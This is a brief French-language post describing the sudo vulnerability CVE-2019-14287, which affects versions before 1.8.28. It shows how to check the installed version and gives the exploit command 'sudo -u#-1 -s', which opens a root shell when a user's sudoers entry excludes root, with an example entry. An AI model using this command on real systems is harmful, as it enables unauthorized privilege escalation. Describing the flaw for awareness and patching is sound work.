Faille Sudo CVE-2019–14287

Une faille cri­tique est appa­ru dans Sudo, toutes les ver­sions de sudo en des­sous de 1.8.28 sont concer­nés.

Connaitre sa ver­sion de Sudo

sudo -V

Pour se connec­ter en tant que super-uti­li­sa­teur il suf­fit de taper

sudo -u#-1 -s

Mais il faut pour cela que l’u­ti­li­sa­teur soit spé­ci­fié dans le fichier sudoers en tant qu’in­ter­dic­tion de deve­nir root tel que:

theo­phile ALL=(ALL, !root) ALL